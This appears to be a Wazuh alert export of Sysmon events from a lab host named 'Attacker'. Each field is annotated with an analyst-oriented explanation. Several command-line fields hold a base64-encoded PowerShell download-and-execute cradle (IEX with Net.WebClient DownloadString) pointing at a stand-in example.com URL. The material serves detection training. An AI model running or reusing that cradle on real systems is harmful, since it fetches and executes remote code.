data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd79-680a-8b0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3688 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 83 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534336.1741285 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:53.8502052Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284944 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:53.827
ProcessGuid: {94294ddc-bd7c-680a-8d0b-000000000e00}
ProcessId: 14828
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_owe3gjix.5wo.ps1
CreationUtcTime: 2025-04-24 22:38:53.827
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:53.827 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd7c-680a-8d0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14828 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_owe3gjix.5wo.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:53.827 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 80 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534339.1744054 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:57.2803391Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284980 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:55.073
ProcessGuid: {94294ddc-bd7f-680a-8f0b-000000000e00}
ProcessId: 2520
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd7c-680a-8d0b-000000000e00}
ParentProcessId: 14828
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:55.073 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd7f-680a-8f0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2520 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd7c-680a-8d0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 14828 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 84 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534339.1752121 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:57.6272922Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284981 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:57.575
ProcessGuid: {94294ddc-bd7f-680a-8f0b-000000000e00}
ProcessId: 2520
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mjeitfip.wlw.ps1
CreationUtcTime: 2025-04-24 22:38:57.569
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:57.575 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd7f-680a-8f0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2520 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mjeitfip.wlw.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:57.569 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 81 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534342.1754886 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:59.8050356Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285021 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:58.630
ProcessGuid: {94294ddc-bd82-680a-910b-000000000e00}
ProcessId: 13540
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd7f-680a-8f0b-000000000e00}
ParentProcessId: 2520
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:58.630 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd82-680a-910b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13540 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd7f-680a-8f0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 2520 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 85 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534342.1762953 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:00.0401311Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285022 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
